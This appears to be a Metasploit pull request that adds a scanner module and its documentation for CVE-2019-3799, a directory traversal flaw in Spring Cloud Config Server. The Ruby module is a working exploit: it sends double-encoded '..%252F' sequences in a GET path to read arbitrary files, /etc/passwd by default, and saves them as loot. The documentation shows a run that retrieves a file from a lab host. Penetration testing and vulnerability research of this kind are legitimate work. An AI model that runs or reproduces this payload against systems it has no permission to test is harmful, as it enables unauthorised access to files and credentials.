### PR TITLE
(CVE-2019-3799) Directory traversal - spring-cloud-config-server

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/springcloud_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/springcloud_traversal.md
@@ -1,0 +1,36 @@
+## Vulnerable Application
+
+his module exploits an unauthenticated directory traversal vulnerabilitywhich exists in spring cloud config, versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, which islistening by default on port 8888.
+
+<b>Related links :</b>
+
+* https://pivotal.io/security/cve-2019-3799
+
+## Verification
+
+```
+Start msfconsole
+use auxiliary/scanner/http/springcloud_traversal
+set RHOSTS
+run
+```
+
+## Scenarios
+
+```
+msf > use auxiliary/scanner/http/springcloud_traversal 
+msf auxiliary(scanner/http/springcloud_traversal) > set RHOSTS 192.168.1.132
+RHOSTS => 192.168.1.132
+msf auxiliary(scanner/http/springcloud_traversal) > run
+
+[+] File saved in: /home/input0/.msf4/loot/20190418203756_default_192.168.1.132_springcloud.trav_893434.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/springcloud_traversal) >
+```
+
+<b>Tested against :</b><br>
+`Linux zero 4.15.0-48-generic #51-Ubuntu SMP Wed Apr 3 08:28:49 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux`
+
+<b>Vulnerable software link :</b>
+* https://github.com/spring-cloud/spring-cloud-config/archive/v2.1.1.RELEASE.zip

--- a/documentation/modules/auxiliary/scanner/http/springcloud_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/springcloud_traversal.md
@@ -1,10 +1,6 @@
-## Vulnerable Application
+## Description
 
-his module exploits an unauthenticated directory traversal vulnerabilitywhich exists in spring cloud config, versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, which islistening by default on port 8888.
-
-<b>Related links :</b>
-
-* https://pivotal.io/security/cve-2019-3799
+This module exploits an unauthenticated directory traversal vulnerability, which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, which is listening by default on port 8888.
 
 ## Verification
 
@@ -16,6 +12,9 @@ run
 ```
 
 ## Scenarios
+
+### Tested against
+`Linux zero 4.15.0-48-generic #51-Ubuntu SMP Wed Apr 3 08:28:49 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux`
 
 ```
 msf > use auxiliary/scanner/http/springcloud_traversal 
@@ -29,8 +28,9 @@ msf auxiliary(scanner/http/springcloud_traversal) > run
 msf auxiliary(scanner/http/springcloud_traversal) >
 ```
 
-<b>Tested against :</b><br>
-`Linux zero 4.15.0-48-generic #51-Ubuntu SMP Wed Apr 3 08:28:49 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux`
-
-<b>Vulnerable software link :</b>
+### Vulnerable software link
 * https://github.com/spring-cloud/spring-cloud-config/archive/v2.1.1.RELEASE.zip
+
+### References
+
+* https://pivotal.io/security/cve-2019-3799

--- a/documentation/modules/auxiliary/scanner/http/springcloud_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/springcloud_traversal.md
@@ -1,20 +1,22 @@
 ## Description
 
-This module exploits an unauthenticated directory traversal vulnerability, which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, which is listening by default on port 8888.
+This module exploits an unauthenticated directory traversal vulnerability, which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6.
+Spring Cloud Config listens by default on port 8888.
+
+### Vulnerable Application
+
+* https://github.com/spring-cloud/spring-cloud-config/archive/v2.1.1.RELEASE.zip
 
 ## Verification
 
-```
-Start msfconsole
-use auxiliary/scanner/http/springcloud_traversal
-set RHOSTS
-run
-```
+1. `./msfconsole`
+2. `use auxiliary/scanner/http/springcloud_traversal`
+3. `set rhosts <rhost>`
+4. `run`
 
 ## Scenarios
 
-### Tested against
-`Linux zero 4.15.0-48-generic #51-Ubuntu SMP Wed Apr 3 08:28:49 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux`
+### Tested against Linux zero 4.15.0-48-generic #51-Ubuntu SMP x86_64 GNU/Linux
 
 ```
 msf > use auxiliary/scanner/http/springcloud_traversal 
@@ -28,9 +30,6 @@ msf auxiliary(scanner/http/springcloud_traversal) > run
 msf auxiliary(scanner/http/springcloud_traversal) >
 ```
 
-### Vulnerable software link
-* https://github.com/spring-cloud/spring-cloud-config/archive/v2.1.1.RELEASE.zip
-
-### References
+## References
 
 * https://pivotal.io/security/cve-2019-3799

--- a/modules/auxiliary/scanner/http/springcloud_traversal.rb
+++ b/modules/auxiliary/scanner/http/springcloud_traversal.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def run_host(ip)
     filename = datastore['FILEPATH']
-    traversal = "..%252F" * datastore['DEPTH'] << filename
+    traversal = "#{"..%252F" * datastore['DEPTH']}#{filename}"
 
     res = send_request_raw({
       'method' => 'GET',

--- a/modules/auxiliary/scanner/http/springcloud_traversal.rb
+++ b/modules/auxiliary/scanner/http/springcloud_traversal.rb
@@ -39,13 +39,18 @@ class MetasploitModule < Msf::Auxiliary
       ])
   end
 
+  def data
+    Rex::Text.rand_text_alpha(3..8)
+  end
+
   def run_host(ip)
     filename = datastore['FILEPATH']
     traversal = "#{"..%252F" * datastore['DEPTH']}#{filename}"
+    uri = "/#{data}/#{data}/master/#{traversal}"
 
     res = send_request_raw({
       'method' => 'GET',
-      'uri'    => "/foo/default/master/#{traversal}"
+      'uri'    => uri
     })
 
     unless res && res.code == 200

--- a/modules/auxiliary/scanner/http/springcloud_traversal.rb
+++ b/modules/auxiliary/scanner/http/springcloud_traversal.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name'        => 'Path Traversal in Spring Cloud Config Server',
       'Description' => %q{
         This module exploits an unauthenticated directory traversal vulnerability
-        which exists in spring cloud config, versions 2.1.x prior to 2.1.2, 
+        which exists in spring cloud config, versions 2.1.x prior to 2.1.2,
         versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, which is
         listening by default on port 8888.
       },

--- a/modules/auxiliary/scanner/http/springcloud_traversal.rb
+++ b/modules/auxiliary/scanner/http/springcloud_traversal.rb
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary
           'Vern', # Vulnerability discovery
           'Dhiraj Mishra' # Metasploit module
         ],
-      'DisclosureDate' => 'Apr 17 2019',
+      'DisclosureDate' => '2019-04-17',
       'License'        => MSF_LICENSE
     ))
 

--- a/modules/auxiliary/scanner/http/springcloud_traversal.rb
+++ b/modules/auxiliary/scanner/http/springcloud_traversal.rb
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'        => 'Path Traversal in Spring Cloud Config Server',
+      'Name'        => 'Spring Cloud Config Server Directory Traversal',
       'Description' => %q{
         This module exploits an unauthenticated directory traversal vulnerability
         which exists in spring cloud config, versions 2.1.x prior to 2.1.2,

--- a/modules/auxiliary/scanner/http/springcloud_traversal.rb
+++ b/modules/auxiliary/scanner/http/springcloud_traversal.rb
@@ -13,9 +13,9 @@ class MetasploitModule < Msf::Auxiliary
       'Name'        => 'Spring Cloud Config Server Directory Traversal',
       'Description' => %q{
         This module exploits an unauthenticated directory traversal vulnerability
-        which exists in spring cloud config, versions 2.1.x prior to 2.1.2,
-        versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, which is
-        listening by default on port 8888.
+        which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,
+        versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6. Spring
+        Cloud Config listens by default on port 8888.
       },
       'References'  =>
         [

--- a/modules/auxiliary/scanner/http/springcloud_traversal.rb
+++ b/modules/auxiliary/scanner/http/springcloud_traversal.rb
@@ -1,0 +1,66 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Path Traversal in Spring Cloud Config Server',
+      'Description' => %q{
+        This module exploits an unauthenticated directory traversal vulnerability
+        which exists in spring cloud config, versions 2.1.x prior to 2.1.2, 
+        versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, which is
+        listening by default on port 8888.
+      },
+      'References'  =>
+        [
+          ['CVE', '2019-3799'],
+          ['URL', 'https://pivotal.io/security/cve-2019-3799']
+        ],
+      'Author'      =>
+        [
+          'Vern', # Vulnerability discovery
+          'Dhiraj Mishra' # Metasploit module
+        ],
+      'DisclosureDate' => 'Apr 17 2019',
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(8888),
+        OptString.new('FILEPATH', [true, "The path to the file to read", '/etc/passwd']),
+        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])
+      ])
+  end
+
+  def run_host(ip)
+    filename = datastore['FILEPATH']
+    traversal = "..%252F" * datastore['DEPTH'] << filename
+
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri'    => "/foo/default/master/#{traversal}"
+    })
+
+    unless res && res.code == 200
+      print_error('Nothing was downloaded')
+      return
+    end
+
+    vprint_good("#{peer} - #{res.body}")
+    path = store_loot(
+      'springcloud.traversal',
+      'text/plain',
+      ip,
+      res.body,
+      filename
+    )
+    print_good("File saved in: #{path}")
+  end
+end


### PR DESCRIPTION
```
        This module exploits an unauthenticated directory traversal vulnerability
        which exists in spring cloud config, versions 2.1.x prior to 2.1.2, 
        versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, which is
        listening by default on port 8888.
```

**Verification**
```
1. Start msfconsole
2. use auxiliary/scanner/http/springcloud_traversal
3. set RHOSTS
4. run
```

**Reference:** 
https://pivotal.io/security/cve-2019-3799
https://twitter.com/chybeta/status/1118370858974760963